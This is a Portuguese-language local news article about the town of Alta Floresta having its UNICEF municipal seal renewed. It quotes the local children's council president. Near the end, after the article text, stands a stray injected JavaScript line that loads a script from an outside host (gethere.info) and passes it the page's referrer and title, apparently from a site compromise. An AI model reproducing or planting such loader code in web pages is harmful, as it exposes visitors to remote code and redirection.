Capa / Cidades / Alta Floresta recebe renovação do Selo Unicef

Alta Floresta recebe renovação do Selo Unicef

15036315_10205962993514500_4783530423366310752_nAlta Floresta recebeu na última sexta-feira 18, a renovação do “Selo UNICEF Município Aprovado” é uma iniciativa para melhorar as condições de vida das crianças e dos adolescentes no Semiárido e na Amazônia Legal Brasileira, áreas que concentram o maior número de meninos e meninas em situação de vulnerabilidade.

A informação foi repassada pelo presidente do Conselho Municipal da Criança e do Adolescente, Clodoaldo Adamczuk, articulador do selo no município. O “Selo UNICEF Município Aprovado” é um reconhecimento internacional que o município pode conquistar. A partir de um diagnóstico e de dados levantados pelo UNICEF, os municípios que se inscrevem passam a conhecer melhor sua realidade e as políticas voltadas para infância e adolescência. Alta Floresta desenvolveu nos últimos quatro anos diversas ações voltadas à infância e a juventude para a conquista do selo.

“Recebemos a notícia maravilhosa hoje de que Alta Floresta ganhou novamente o Selo Unicef. Atuar como articulador do Selo Unicef em Alta Floresta foi extremamente desafiador para mim, manter um selo que já fora conquistado não é fácil, as obrigatoriedades são maiores e as ações mais profundas, foram praticamente 4 anos de trabalho árduo, para garantir que estas ações voltadas para crianças e adolescentes acontecessem da forma como preconiza o ECA e a UNICEF é garantir a absoluta prioridade”, destacou Adamczuk.

O objetivo das iniciativas é levar a administração a campo e recolher dados concretos e interagir e ter a participação popular, para rever suas políticas e repensar estratégias de forma a alcançar os objetivos buscados, realizando a capacitação de atores municipais, aprimoramento dos mecanismos de gestão local e mobilização social, com ampla participação comunitária, principalmente dos adolescentes. Os municípios que se inscrevem no Selo são agrupados de acordo com sua realidade socioeconômica e assumem o compromisso de elaborar um diagnóstico participativo da situação de suas crianças e seus adolescentes e um Plano Municipal de Ação para enfrentar os principais problemas que afetam meninas e meninos.

Agora durante os próximos 04 anos o município desenvolverá diversas ações para a conquista da renovação do selo. “Estou extremamente feliz pela conquista, pelo trabalho e apoio de todos envolvidos, não foi fácil, mas vencemos, obtivemos o reconhecimento internacional de que somos um município que olha e cuida de suas crianças, há muito que precisamos melhorar, mas, estamos no caminho certo. Obrigado a todos pelo apoio, ao membros do CMDCA pela confiança e ao nosso prefeito municipal Asiel por ter me confiado esta responsabilidade, está aí, mais uma conquista para nossa cidade”, agradeceu Adamczuk

A primeira experiência do Selo UNICEF ocorreu no Ceará, em 1999, onde foram realizadas três edições estaduais. Em 2005, o Selo foi ampliado para todo o Semiárido e, em 2009, para a Amazônia Legal Brasileira. Em 2013, 1.745 municípios do Semiárido e da Amazônia inscreveram-se na atual edição do Selo UNICEF Município Aprovado Edição, que se encerra em 2016.

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre Kariny Santos

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top